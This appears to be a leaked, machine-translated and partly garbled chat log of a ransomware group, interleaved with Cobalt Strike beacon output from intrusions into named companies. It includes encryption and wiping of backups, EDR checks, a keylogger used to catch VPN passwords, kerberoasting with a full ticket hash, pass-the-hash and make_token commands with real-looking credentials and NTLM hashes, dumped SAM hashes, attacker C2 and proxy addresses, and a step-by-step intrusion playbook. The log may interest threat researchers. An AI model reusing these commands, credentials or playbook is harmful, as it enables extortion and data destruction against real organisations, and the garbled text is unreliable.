 1gb fil 01/15/2021 23:07:40 HendersonD2021-01-02T180037_48E3.vib.RQGNN
 2gb fil 01/15/2021 23:09:01 HendersonD2021-01-03T180036_AB87.vib.RQGNN
 2gb fil 01/15/2021 23:10:27 HendersonD2021-01-04T180036_232E.vib.RQGNN
 2gb fil 01/15/2021 23:11:52 HendersonD2021-01-05T180029_410C.vib.RQGNN
 2gb fil 01/15/2021 23:13:07 HendersonD2021-01-06T180029_FE5D.vib.RQGNN
 3gb fil 01/15/2021 23:15:05 HendersonD2021-01-07T180031_D080.vib.RQGNN
 7gb fil 01/15/2021 23:19:29 HendersonD2021-01-08T180033_9BF8.vib.RQGNN
 2gb fil 01/15/2021 23:20:41 HendersonD2021-01-09T180036_A541.vib.RQGNN
 1gb fil 01/15/2021 23:21:48 HendersonD2021-01-10T180033_2241.vib.RQGNN
 1gb fil 01/15/2021 23:22:58 HendersonD2021-01-11T180034_3739.vib.RQGNN
 1gb fil 01/15/2021 23:24:16 HendersonD2021-01-12T180042_43E6.vib.RQGNN
 2gb fil 01/15/2021 23:26:05 HendersonD2021-01-13T180025_5427.vib.RQGNN
 2gb fil 01/15/2021 23:27:43 HendersonD2021-01-14T180029_951F.vib.RQGNN
 1gb fil 01/15/2021 23:28:53 HendersonD2021-01-15T180033_F651.vib.RQGNN
 930b fil 01/15/2021 22:14:24 readme.txt
``How much is ready?:meat_on_bone:well without the marble beef it's hard to wait chet (if you're going to order then orderwaitWe need to allocate budget for the second food order it's another hour and a half at least(wait for finals with backups even less than half is still alive:man_shrugging:prolly dead)skully and tdservers what cut off?session is alive backups are still encrypted (apparently takotrubili?
beacon> shell ping -n 1 10.89.11.40
[*] Tasked beacon to run: ping -n 1 10.89.11.40
[+] host called home, sent: 52 bytes
[+] received output:

Pinging 10.89.11.40 with 32 bytes of data:
Request timed out.

Ping statistics for 10.89.11.40:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
How's the progress on the backups? 20 more minutes, the guys said they ran through the servers - everything is OK, encrypted.)
```
E:Backups -size 15
There ``may be lags for the following reason - it's a virtualulka, it gets encrypted in several threads, and on the disk, where this virtualulka lies, the space freed from backups gets filled with crap at the same time. That's the disk io and does not take out. But it's not sure)) let me try again from the neighboring process with the flag? no, it's 181gb stalled... the rest are still intact... one that's less than a megabyte encrypted how many files? it will encrypt them until monday... let it encrypt them not.
 Directory of E:\

01/15/2021 09:24 PM <DIR> Backups
01/15/2021 09:24 PM <DIR> ProgramData
01/15/2021 09:24 PM 930 readme.txt
01/15/2021 09:24 PM <DIR> Test
               1 File(s) 930 bytes
               3 Dir(s) 1,824,136,421,376 bytes free

Last time, in the same domain, the backups were monitored for a few more days and there is a script that will quickly fill it all up. what is the disk size? delete and fill it up with crap. let's try to delete it, but it won't be faster. the process is running, but 1 file changed?where's the progress? would it be faster to delete them? what are we doing now? all the other backups in the ex are in progress? backups are in progress, another 10-15% have reformatted esx and snaps? backups are encrypted? domain vide unshared disks and killed important processes?
servers:

US.ALLOYPOLYMERS.COM
by hell: 47
alive: 10
closed 10

WINONA.RTPCO.LOCAL
by hell: 52
alive:45
closed 45

RTPCO.LOCAL
by hell: 106
alive: 90
shut down: 90
``````
ARMS:
 
RTPCO.LOCAL
By hell: 1,076
Alive: 217
 
WINONA.RTPCO.LOCAL
By hell: 65
Alive: 12
 
US.ALLOYPOLYMERS.COM
By hell: 501
Alive: 24

All disks were unshared everywhere, important processes were killed
``````
WINONA.RTPCO.LOCAL

On one server (WEB4) 16 IPs, 14 pulled in :D

by hell: 52
attracted: 45

with live ones, in the list of pinged they are 70, minus 15 ips that are held on 1 hostname = 55

WEB4.winona.rtpco.local [89.0.0.158] - pulled up on different IP
WEB4.winona.rtpco.local [89.0.0.152] - pulled up on another IP
ip-0-206.sprint-rev.hbci.com [65.162.42.206] - no 445
ip-0-252.sprint-rev.hbci.com [65.162.42.252] - no 445
ip-0-254.sprint-rev.hbci.com [65.162.42.254] - no 445
ip-0-197.sprint-rev.hbci.com [65.162.42.197] - no 445
ip-0-251.sprint-rev.hbci.com [65.162.42.251] - no 445
ip-0-242.sprint-rev.hbci.com [65.162.42.242] - no 445
ip-0-250.sprint-rev.hbci.com [65.162.42.250] - no 445
``rtpco.
90/90
4 zamapilnu get takmap? ni piepni psekni vmikne fly ``
US.ALLOYPOLYMERS.COM

by hell: 47
alive: 10
Attracted: 6
not attracted: 4, covered

AlloyAMMS.us.alloypolymers.com: 10.1.1.231
alloylicweb.us.alloypolymers.com: 10.1.1.238
alloyxenapp.us.alloypolymers.com: 10.1.1.237
alloyapp3.us.alloypolymers.com: 10.1.1.250
``They're at 445 check psek and other past?
```
10.89.11.120 -
10.56.0.30 -
10.89.11.26 -
10.56.0.31 -
in the list of servers such kutera at all I'm in the log of the pulled in ipi from other domains as resovlit? it's ping - and the issuance of that external-0-206.sprint-rev.hbci.com [65.162.42.206] - no 445
ip-0-252.sprint-rev.hbci.com [65.162.42.252] - no 445
ip-0-254.sprint-rev.hbci.com [65.162.42.254] - no 445
ip-0-197.sprint-rev.hbci.com [65.162.42.197] - no 445
ip-0-251.sprint-rev.hbci.com [65.162.42.251] - no 445
ip-0-242.sprint-rev.hbci.com [65.162.42.242] - no 445
ip-0-250.sprint-rev.hbci.com [65.162.42.250] - no 445 more than 100% as they say in the peoplevot because of this turns out in the list of servers are 52, and in the list of live - 70 ``.
WEB4.winona.rtpco.local: 89.0.0.66
WEB4.winona.rtpco.local: 89.0.0.160
WEB4.winona.rtpco.local: 89.0.0.159
WEB4.winona.rtpco.local: 89.0.0.158
WEB4.winona.rtpco.local: 89.0.0.157
WEB4.winona.rtpco.local: 89.0.0.156
WEB4.winona.rtpco.local: 89.0.0.155
WEB4.winona.rtpco.local: 89.0.0.154
WEB4.winona.rtpco.local: 89.0.0.153
WEB4.winona.rtpco.local: 89.0.0.152
WEB4.winona.rtpco.local: 65.162.42.250
WEB4.winona.rtpco.local: 65.162.42.242
WEB4.winona.rtpco.local: 65.162.42.197
WEB4.winona.rtpco.local: 65.162.42.254
WEB4.winona.rtpco.local: 65.162.42.252
WEB4.winona.rtpco.local: 65.162.42.251
``````
ip-0-206.sprint-rev.hbci.com [65.162.42.206] - no 445
ip-0-252.sprint-rev.hbci.com [65.162.42.252] - no 445
ip-0-254.sprint-rev.hbci.com [65.162.42.254] - no 445
ip-0-197.sprint-rev.hbci.com [65.162.42.197] - no 445
ip-0-251.sprint-rev.hbci.com [65.162.42.251] - no 445
ip-0-242.sprint-rev.hbci.com [65.162.42.242] - no 445
ip-0-250.sprint-rev.hbci.com [65.162.42.250] - no 445
````10.89.11.33
10.56.0.30
10.89.11.31
10.5.0.4
10.89.11.39
10.17.1.6
10.89.11.26
10.28.0.5
10.5.0.5
10.58.0.31
89.0.0.81
10.58.0.35
10.89.12.29
10.7.0.25
10.89.11.10
10.58.0.30
10.89.11.22
10.89.11.24
10.5.0.19
10.1.10.10
10.89.11.13
10.7.0.40
10.56.0.31
10.57.0.25
10.89.11.120
10.89.10.12 ``[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=kyyNPrj7yHJvyTG5K) ``
make_token ALLOY\Administrator j@mez9olk
```
```
pth WINONA\dch 876c802a60e4623dae480bf75d215bbc
```
```
pth RTPCO\Administrator 468b54c4c90c3f6e96486d9f0227540b
``````
185.150.189.165:21328
oRBZ6uRQQXg3EYp855awPPRBVQ8V7MooXcUR
``yeah. and also on top, if linux allowed you to zero kill?[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=khC6izSwxJ7zK2oCT) why, there will be nothing left?the bild throw activeladno on nixes then unpack the folder i hope that i already deleted everything from there i also deleted in mega there is a treshell) i did not delete that) fucklists and separate files that were taken out not pour in mega pure files from network delete put this archive in mega[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=fH2KsEoTv697XoKSy) listings, i will add the listings? i do not have more there archive with backups of boring
luqdztoszgtqucubfv@upived.online
asdergIJW3RETmjite453
``Give access to the accounts from megitut data collected? Good night) good night tomorrow by 3session in slip files deleted ok for today everything.yesTomorrow work? check your ballymore fell off or not.  my offs worked for an hour)) #1-done-rtpcompany-com has a system so you can change the status of the result ok just access to rps apparently)and he is not LA and the first - current last time there was no funny thing, just ran SharpShares` ``
[+] received output:
Shares for 27L28:
	[--- Unreadable Shares ---]
		HP LaserJet Pro M404dn
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ print$

[+] received output:
Shares for HENDSTORAGE:
	[--- Unreadable Shares ---]
		Gina(HP Color LaserJet CP3525)
		Gina(HP LaserJet 400 M401dne)
		HP MFP477 QA Lab
		IPC$
		Matt(HP LaserJet 400 M401dne)
		Warehouse Office MFP(HP LaserJet 400 MFP M425dn)
		Warehouse Office(HP LaserJet 400 M401dne)
	[--- Listable Shares ---]
		ADMIN$ Apps C$ D$ Distro E$ GPO_Installs InstallApps ISOs Maint Office print$ Shared Users

``and select different groups do we have admin rights there?
```
\30L71.rtpco.local\ADMIN$ - Remote Admin
\30L71.rtpco.local\C$ - Default share
\30L71.rtpco.local/IPC$ - Remote IPC
I understand it correctly, do I have to check 415 machines by name in ad_compacts now? from different OU[ ](https://mediaeveryone.com/channel/general?msg=8gp4Z6s3knM7Z7iWp) didn't understand it and I asked for respawnsession failed at one moment I've played with both dir and lhome[ ](https://mediaeveryone.com/channel/general?msg=o6tMFScKZHG3cJJ6y) from different groups either it gives nothing or access is denied[ ](https://mediaeveryone.com/channel/general?msg=7nTdHajYQxDGJfPsA) 415there's jurl, username, password, click on the list, log in to the site, how do you get information from Lastpasa? how much access?? everywhereb access to the fs is denied and remot tula works, why is it vmic and even if even dir does not give vmic?dir[ ](https://mediaeveryone.com/channel/general?msg=DcCxwQPhssGgSCPLZ) only vmik checked?
what does it say?
Donald J. Trump (@realDonaldTrump) / Twitter - Mozilla Firefox
=======
[control][ctrl]
``He also tweets it#ballymoregroup-com Found a VPN, took off my browser. the passwords from my browser to the VPN didn't work. Installed keylogger and since now on the screen lockscreen - there is a chance to catch a password. while looking in the files on the disk. SearchOutlook.exe isn't looking for anything.[ ](https://mediaeveryone.com/channel/general?msg=oWPnwwNseAH2uEowX) golden ticket done, found alive yes, check admin comps (fs, ff) in #1-done-rtpcompany-com spawnas not working under any credentials, under current polzakami removed the balls
SharpShares: no listable shares besides print$
ShareFinder: where it says Remote Admin - it won't let me in
 
in #waterway-com check passwords lastpass/logmein, except mharper'a I do not see anyone yet, at the same time watching the keyloggerBut no change, started looking for mozilla on computers where admins are pledged and check the password file from the keyloggerwrite what you have on progress not in that window) again some matyladno now look yyudshp who knows it)))) where it saves the log? no configurations...exactly there, i did not notice it in the toolchain saw the keylogger? is there a third-party keylogger worthy of attention? if @user7 has something let him drain it there you seem to have everything there is this conf) `rawint.com ` no dotsink? well work if it flew to what edition of sofosag seems only sofos and winndef` ``
16464 972 LockApp.exe x64 1 BALLYMOREGROUP\rpearce
 3988 748 SavService.exe
 5184 748 SAVAdminService.exe
 5372 748 ALsvc.exe

``whenever there is a hardwindefc, see what else on ps see the red processes``.
[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 57 bytes
[+] savonaccess.sys Found
[+] 1 EDR Products Found!
    ======================
    | Vendor Information |
    ----------------------
[+] Sophos Found!

``I noticed that edr kvetch does not show all through edr + psst tell me what AV + because your coba was the cleanest show session put your shelkodblya, I had in the old one for some reason came ...-you do not fly? so not yet took silkodblya) and I do not fly by the classical 20 minutes put the scanners do not sleep as well by the way come silkods +- + preferably clean all koba have?+ + there are not even files AD in the confab, apparently a serious AB at the entrance to the baly recommend access to the VPN #ballymoregroup-com and here +1 together with @user7 + here one man # 1-done-rtpcompany-comobe already had two nets to work I, by the way, also seem to have gone stale I do not have clean kobe?add me in #evo-com:man_raising_hand: I'm in place:space_invader:haiprivEveryone hello tomorrow by 5shuyut home with a laptop have triedAll this works on the wind and if you go outside We have two whistles on simki - do not work, two wi-fi sphistki, of which only one works but not enough speed to even open a page in the browser does not work through a smartphone, or as a general There are no options We have tried everything in the network settings in line does not show the available equipment?How to connect them to the computers if Linux does not see them What is the problem with 5 modems? In any case, the network is not catching Yes a new one? So maybe it is the modem? There is no internet In the personal cabinet goesNo we configured 2 different data that the provider sent mab chet with the modem? if there is internet in the office Leo brought all options but they do not workWhat do we do? Internet we will not have, tried everything (c) Leone The bottom line - I brought 2 whistles in the pictures, they do not work on the Linux (Beeline and Tele2) brought 2 antenna wi-fi, 1 of them received the Linux, and the phone and the laptop gave out and one and the same, does not even load anything. Vpn does not even connect. The second whistle does not work does not see. Phone podkyodyayu cherd wire - does not want to include the modem ubs. The provider, in turn, our side say that everything is clear, the Internet from our side is, if it does not work, wait for the manager at 10 am. you Lena can not make up 5 modems and 5 sims? and how do you want to give out what? No ofk you wanted to give out from the phone?) On the phones They have some man left, who is responsible for our address mobile - modem?fuckin' hell our mobile internet sucks, but the internet guys said they'd do it tomorrow How's your internet situation? Why is everyone getting locked up? I hope you didn't go to the link without a VPN 👍 Anyway, Lenya's got some provider to give us the internet
Internet will give, setup will take from one hour Okay, let them give you LTE modems with SIM card kits. it's to LenaThere is maintenance work at the provider, I don't know when it will end Writing from mobile We have no internet in the office Hi, Mon by what time? Yes, that's it
yes, everything...I've got a couple more restored to make sure the long slip is on, man_shrugging:then it should also reach the admin...the second one also knocks on the bilder should reach if it goes to the first one...
beacon> shell ping -n 1 asdasdasdsa.sadasdsadsa.kalarada.com
[*] Tasked beacon to run: ping -n 1 asdasdasdsa.sadasdsadsa.kalarada.com
[+] host called home, sent: 77 bytes
[+] received output:

Pinging asdasdasdsa.sadasdsadsa.kalarada.com [195.123.214.148] with 32 bytes of data:
Reply from 195.123.214.148: bytes=32 time=131ms TTL=49

Ping statistics for 195.123.214.148:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 131ms, Maximum = 131ms, Average = 131ms

`` hmm.
the domain works...here's how to ping asdasdasdsa.sadasdsa.domain.com -n 1 I don't mean just check otherwise) ``
beacon> shell ping -n 1 kalarada.com
[*] Tasked beacon to run: ping -n 1 kalarada.com
[+] host called home, sent: 53 bytes
[+] received output:

Pinging kalarada.com [195.123.214.148] with 32 bytes of data:
Reply from 195.123.214.148: bytes=32 time=131ms TTL=49

Ping statistics for 195.123.214.148:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 131ms, Maximum = 131ms, Average = 131ms

beacon> shell ping -n 1 www.kalarada.com
[*] Tasked beacon to run: ping -n 1 www.kalarada.com
[+] host called home, sent: 57 bytes
[+] received output:

Pinging www.kalarada.com [195.123.214.148] with 32 bytes of data:
Reply from 195.123.214.148: bytes=32 time=133ms TTL=49

Ping statistics for 195.123.214.148:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 133ms, Maximum = 133ms, Average = 133ms

I`m not sorry) test it) okay, do not touch the domains can not knock for other reasons if there are bots in the network on the backdoor admin - then the domains are alive directly from the car where you run) well, ping from where does not knock knew, but the fact that does not knock for 3 zakrepaty not know what?it means "it will" and if it gives out ipiniknado pinging level 3 domains it is very easy to check I only have 2) to check? or you do not have others? why? muncucfarfarisaa which ones are added?) I do not remember the other 2 domains have a mask
```
Adobe autoupdate#41162 1/22/2021 10:43:28 PM Running
``Let's change domains (there's no backups) there's one print server that's restored all the servers are important Why backups?
```
	main.crispregional.org 10.1.0.22 https SYSTEM * CRHSBACKUP
this is a new crispispisp version of the 10.1.1.22. if you want to copy and paste it into another crisp, it needs to be done before monday, i suggest we finish this today.
1. Gathering initial information about the domain and the environment
	- Full domain name
	- DCs list
	- LA\DA\EA
	- Password policy
	- PS
	- EDR
	- Systeminfo
On the basis of this information we see what kind of network we are looking at: a workgroup with VPN, a lab, a work network. If you can't make a conclusion from step 1, go to step 2.

2. Collecting BP information
	- ADFind
	- ADFind trust
If the total size of the files is more than 40mb, you need to put them into the archive. After analyzing the AD we make a conclusion about the network type. If it is a workgroup without a visible domain, we skip it and get the next network to work on. If a full-fledged network, move on

3. Gathering additional information about the domain and environment
	- Browser Dump
	- Seatbelt
	- kerberoast, asreproast
	- DuzzleUP
	- WinPEAS
	- Watson
	- GPP
	- ShareFinder
	- Check ZeroLogon
all files in the process and logs you put in a folder with the name of the external network domain, under the names corresponding to the utilities you run. You pass the brute-force hashes to team lead 2

4. Additional actions. During ShareFinder run, we run persist on the entry point (ONLY IF YOU SUGGESTED IT)
	- generate a NEW build for EVERY run
	- hide dll in user folders (preferably appdata and as far away as possible)
	- run it, check if the dll is not deleted + staska appeared, write to me: hostname, startup rights

all files are duplicated in the conf, as well as stored in a separate folder at your local location. Information about DC, LA, DA, EA, and all the passwords found in the process you put in a separate file creds.txt

5. If during or after the ShareFinder, as well as a quick brute-force hash, you get the opportunity to get out of the entry point, then by all means take advantage of it. Such a network gets priority and is not interrupted
``and check the login and passwords without a domain on itproping at least 1 successfulproping all pk from the group of the current user in the domain there is a user with the same name as this admin, but he is not active for a long time in this situation 2-2 is me who is so clever?
user 2-2 beacon> shell net user GPJHelp
[*] Tasked beacon to run: net user GPJHelp
[+] host called home, sent: 47 bytes
[+] received output:
User name GPJHelp
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set ?4/?18/?2018 9:47:12 AM
Password expires Never
Password changeable ??4/?18/?2018 9:47:12 AM
Password required No
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon ??4/?18/?2018 11:53:55 AM

Logon hours allowed All

Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.

I don't think so, but his domain often drops out. Was there a VPN as well? Are there any requests going through?
```
shell ping 192.168.30.42
Pinging 192.168.30.42 with 32 bytes of data:
Ping statistics for 192.168.30.42:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
````execute-assembly Rubeus.exe kerberoast /format:hashcat /outfile:C:\ProgramData\hashes_rub_all.txt
$krb5tgs$23$*Pwwadfssvc$gpj.loc$host/STS.GPJ.COM*$19A27B2CD79CEB241CF9ED5E168FF22F$5195C6633D2F53FB0421BCBD97CD5AB57BE8EB06D2BE66C5C5CDB369384AD4BD72D772C383EACA9F2BEA60B444880A57502AC7D519722FC4620285DB747DF73CDB06267B397FED50A901F75CEBA2B59599CEF50A0354F6B5E2753C8AF61EC1BAEDB5F5562B90BDA373D9571308712FBC1F50FAB83F756809A48CFAB1FB91A3A839520AE873568071CE4109DDFDBC5C4188CB5420CF38AC2F8B7E4FB0CD0D65A1A46440492C9FD20B2AC6E0BB137CA82996CC1F634CFC84F2623EDA9EC03164BB7CA6DA697B548389CEF07C7E09E1C5B4E823BC03CF9217838B44AE76B7493B0F8A312C59F04AEF6868CB78F1A699946FAF69708DA43AE7C46502A77EF99D2506BCE37F0F553A703CB9E4E1D4115823C82DBC0722620EFF5D4B6F2F0B0BD68E05CE98F8B315C311EBE1CB3F2F4981F35B30E3EABA8F258DD4843FBFECD7BBE29478798B1E832002E33185D50796D0BD92404FCACA3CD50F14F86097997A82A42F237CA1649A58C6B2767DAD2E7CFFDB1698326C920D64F7592AD1D54B3C55AE0A8FE0F92D0DA652EC45118894A4672011B8B85306E80593374420F2E0CD15B336F9AF860529469F9584FA55ED68732DD644E12D39CB3DB3BCFADCD8E5801EA44033567263903069CDE4B93A061C088B661C81DF913575B9FC9B842F5BD74F07E51C8891C3583006523016F9E2B3

``Pass to brute-force write it down in the future and it was most likely disabled.
The request will be processed at a domain controller for domain gpj.loc.

User name GPJHelp
Full Name GPJHelp
Comment Helpdesk service account
User's comment
Country/region code 000 (System Default)
Account active No
Account expires Never

Password last set ?3/?29/?2011 9:04:23 AM
Password expires Never
Password changeable ??3/?29/?2011 9:04:23 AM
Password required Yes
User may change password No

Workstations allowed All
Logon script
User profile
Home directory
Last logon Never

Logon hours allowed All

Local Group Memberships
Global Group memberships *Service Accounts *Domain Users
I wanted to check access, but you have to do it if it is not a domain and it's a local account.
user 2-3 beacon> shell dir \192.168.120.28\C$
[*] Tasked beacon to run: dir \192.168.120.28\C$
[+] host called home, sent: 54 bytes
[+] received output:
This user can't sign in because this account is currently disabled.

user 2-3 beacon> shell dir \10.200.100.42\C$
[*] Tasked beacon to run: dir \\10.200.100.42\C$
[+] host called home, sent: 53 bytes
[+] received output:
This user can't sign in because this account is currently disabled.

user 2-3 beacon> shell dir \\192.168.140.3\C$
[*] Tasked beacon to run: dir \\192.168.140.3\C$
[+] host called home, sent: 53 bytes
[+] received output:
This user can't sign in because this account is currently disabled.

user 2-3 beacon> shell dir \192.168.221.42\C$
[*] Tasked beacon to run: dir \192.168.221.42\C$
[+] host called home, sent: 54 bytes
[+] received output:
This user can't sign in because this account is currently disabled.

``````
beacon> shell dir \\192.168.120.28\C$
[*] Tasked beacon to run: dir \192.168.120.28\C$
[+] host called home, sent: 54 bytes
[+] received output:
This user can't sign in because this account is currently disabled.

``Check on any host to make sure the accesses are valid.
dn:CN=GPJHelp,OU=Users,OU=Admins,DC=gpj,DC=loc
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>cn: GPJHelp
>sn: Help
>description: Helpdesk service account
>givenName: GPJ
>distinguishedName: CN=GPJHelp,OU=Users,OU=Admins,DC=gpj,DC=loc
>instanceType: 4
>whenCreated: 20100203200249.0Z
>whenChanged: 20180413150136.0Z
>displayName: GPJHelp
>uSNCreated: 14194
>memberOf: CN=Service Accounts,OU=Groups,OU=AuthManagement,DC=gpj,DC=loc
>uSNChanged: 159601513
>name: GPJHelp
>objectGUID: {BFFE42F1-B611-41BD-85FD-7E31917C25C0}
>userAccountControl: 66050
>badPwdCount: 1
>codePage: 0
>countryCode: 0
>badPasswordTime: 132127983133838189
>lastLogoff: 0
>lastLogon: 0
>pwdLastSet: 129458774625564022
>primaryGroupID: 513
>objectSid: S-1-5-21-1795611735-3404200554-1966915844-1156
>accountExpires: 9223372036854775807
>logonCount: 0
>sAMAccountName: GPJHelp
>sAMAccountType: 805306368
>userPrincipalName: GPJHelp@gpj.loc
>lockoutTime: 131681052967595316
>objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=gpj,DC=loc
>dSCorePropagationData: 20171016211900.0Z
>dSCorePropagationData: 20171016205841.0Z
>dSCorePropagationData: 20171016202841.0Z
>dSCorePropagationData: 20171016202218.0Z
>dSCorePropagationData: 16010714223649.0Z
>lastLogonTimestamp: 129125338780643881
>msDS-SupportedEncryptionTypes: 0
``Domain Controllers:''.
Domain Controllers:

 Server Name IP Address
 ----------- ----------

[+] received output:
 DETMSDC01 192.168.11.42
 LAXMSDC01 192.168.30.42
 BNGMSDC01 192.168.110.42
 SFOMSDC01 10.200.132.52
 DETMSDC02 192.168.11.43
 TOKMSDC01 192.168.90.6
 SHARMSDC01 10.220.136.40
 SYDMSDC01 192.168.101.42
 SNGMSDC01 192.168.241.42
 NYCMSDC01 10.201.36.42
 AUSMSDC01 192.168.221.42
 SFOAMSDC01 10.200.164.42
 DENMSDC01 10.200.196.42

[+] received output:
 LONMSDC02 10.210.4.42
 BEIMSDC02 192.168.120.28
 SHAMSDC02 192.168.140.3
 BOSMSDC01 10.200.228.42
 HKGMSDC01 192.168.230.42
 STURMSDC01 192.168.61.42
 PLNMSDC02 10.200.4.42
 MELMSDC01 10.220.68.42
 SHARMSDC02 10.220.136.42
 STURMSDC10 192.168.66.42
 STURMSDC20 192.168.67.42
 ROCMSDC01 10.200.100.42
 SFO2MSDC03 10.200.132.42
 STUGMSDC10 192.168.71.18
You can try it directly on the DC, 50% of the time it's a local admin there as well, it should roll on the pc from that group
beacon> shell net group "Domain Admins" /dom
[*] Tasked beacon to run: net group "Domain Admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain gpj.loc.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
ADAXES AMoultonADM bigfix
ELittleADM JStriberADM pwwDirAdmin
TMunsonADM
The command completed successfully.

``Password
5015T1ce
``opaaaah''
GPJHelp:1001:aad3b435b51404eeaad3b435b51404ee:6f2e383aaec00617d60f8a23e7fed5e2:::
``````
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
GPJHelp:1001:aad3b435b51404eeaad3b435b51404ee:6f2e383aaec00617d60f8a23e7fed5e2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:7f1bb527f5d3c495c3b53a4754d38ede:::
``timelysession come fly the session from here eishenu zerologon breaks dk yes, so you have to be careful here dka, that's what I meant) thank you)іGood morning
maybe zerologon?mb not tehmozhet fit something like that from mylearning GSI there keylogger caught some password from Lisa ran through the configuration of the Lisa with Richard's creeds - the same everything, should connect and said that the error unknownhodu creeds not the best guides such always pick upa there among the obvious points could be an item with a solution to the problem) but there at the level of
start the client
enter login
enter password
there's no problem with it, just press okeyv sitbelt by richard so there's no codewhen this richard's machine isn't working right nowfind some dude's docs on iphone startup, maybe there's no help here either.
Wed Oct 21 21:02:54 2020 OpenVPN 2.4.7 x86_64-w64-mingw32 [SSL (OpenSSL)] [LZO] [LZ4] [PKCS11] [AEAD] built on Apr 25 2019
Wed Oct 21 21:02:54 2020 Windows version 6.2 (Windows 8 or greater) 64bit
Wed Oct 21 21:02:54 2020 library versions: OpenSSL 1.1.0j 20 Nov 2018, LZO 2.10
Wed Oct 21 21:02:54 2020 MANAGEMENT: TCP Socket listening on [AF_INET]127.0.0.1:25342
Wed Oct 21 21:02:54 2020 Need hold release from management interface, waiting...
Wed Oct 21 21:02:55:55 2020 MANAGEMENT: Client connected from [AF_INET]127.0.0.1:25342
Wed Oct 21 21:02:55 2020 MANAGEMENT: CMD 'state on'
Wed Oct 21 21:02:55 2020 MANAGEMENT: CMD 'log all on'
Wed Oct 21 21:02:55 2020 MANAGEMENT: CMD 'echo all on'
Wed Oct 21 21:02:55 2020 MANAGEMENT: CMD 'bytecount 5'
Wed Oct 21 21:02:55 2020 MANAGEMENT: CMD 'hold off'
Wed Oct 21 21:02:55 2020 MANAGEMENT: CMD 'hold release'
Wed Oct 21 21:02:56 2020 MANAGEMENT: CMD 'username "Auth" "richards"'
Wed Oct 21 21:02:56 2020 MANAGEMENT: CMD 'password [...]'
Wed Oct 21 21:02:56 2020 MANAGEMENT: >STATE:1603306976,RESOLVE,,,,,,
Wed Oct 21 21:02:56 2020 TCP/UDP: Preserving recently used remote address: [AF_INET]50.202.106.2:9443
Wed Oct 21 21:02:56 2020 Socket Buffers: R=[65536->65536] S=[65536->65536]
Wed Oct 21 21:02:56 2020 Attempting to establish TCP connection with [AF_INET]50.202.106.2:9443 [nonblock]
Wed Oct 21 21:02:56 2020 MANAGEMENT: >STATE:1603306976,TCP_CONNECT,,,,,,
Wed Oct 21 21:04:56 2020 TCP: connect to [AF_INET]50.202.106.2:9443 failed: Unknown error
``Dasox definitely off? waiting and again on tcp_connect thought chetokevsena and vpnts as if meant as not in the network it is external so you specify in vpn the address of their vpn server there are attacks to chase, i am not in their network why? it is in the open vpn proxy i pointed out not yours?
Wed Oct 21 20:58:31 2020 MANAGEMENT: CMD 'proxy SOCKS 104.243.40.126 1337'
``Yes''.
Wed Oct 21 20:58:32 2020 MANAGEMENT: >STATE:1603306712,TCP_CONNECT,,,,,,
Wed Oct 21 21:00:32 2020 TCP: connect to [AF_INET]104.243.40.126:1337 failed: Unknown error
Is it responding? I'm working in it as it should be? Does it work? What do you mean? Did it stop on tcp_connect, did it crash? It's going well so far with no errors
Wed Oct 21 Oct 20:58:29 2020 OpenVPN 2.4.7 x86_64-w64-mingw32 [SSL (OpenSSL)] [LZO] [LZ4] [PKCS11] [AEAD] built on Apr 25 2019
Wed Oct 21 20:58:29 2020 Windows version 6.2 (Windows 8 or greater) 64bit
Wed Oct 21 20:58:29 2020 library versions: OpenSSL 1.1.0j 20 Nov 2018, LZO 2.10
Wed Oct 21 20:58:29 29 2020 MANAGEMENT: TCP Socket listening on [AF_INET]127.0.0.1:25342
Wed Oct 21 20:58:29 29 2020 Need hold release from management interface, waiting...
Wed Oct 21 20:58:29:29 2020 MANAGEMENT: Client connected from [AF_INET]127.0.0.1:25342
Wed Oct 21 20:58:30 2020 MANAGEMENT: CMD 'state on'
Wed Oct 21 20:58:30 2020 MANAGEMENT: CMD 'log all on'
Wed Oct 21 20:58:30 2020 MANAGEMENT: CMD 'echo all on'
Wed Oct 21 20:58:30 2020 MANAGEMENT: CMD 'bytecount 5'
Wed Oct 21 20:58:30 2020 MANAGEMENT: CMD 'hold off'
Wed Oct 21 20:58:30 2020 MANAGEMENT: CMD 'hold release'
Wed Oct 21 20:58:31 2020 MANAGEMENT: CMD 'username "Auth" "richards"'
Wed Oct 21 20:58:31 2020 MANAGEMENT: CMD 'password [...]'
Wed Oct 21 20:58:31 2020 MANAGEMENT: CMD 'proxy SOCKS 104.243.40.126 1337'
Wed Oct 21 20:58:32 2020 TCP/UDP: Preserving recently used remote address: [AF_INET]104.243.40.126:1337
Wed Oct 21 20:58:32 2020 Socket Buffers: R=[65536->65536] S=[65536->65536]
Wed Oct 21 20:58:32 2020 Attempting to establish TCP connection with [AF_INET]104.243.40.126:1337 [nonblock]
Wed Oct 21 20:58:32 2020 MANAGEMENT: >STATE:1603306712,TCP_CONNECT,,,,,,
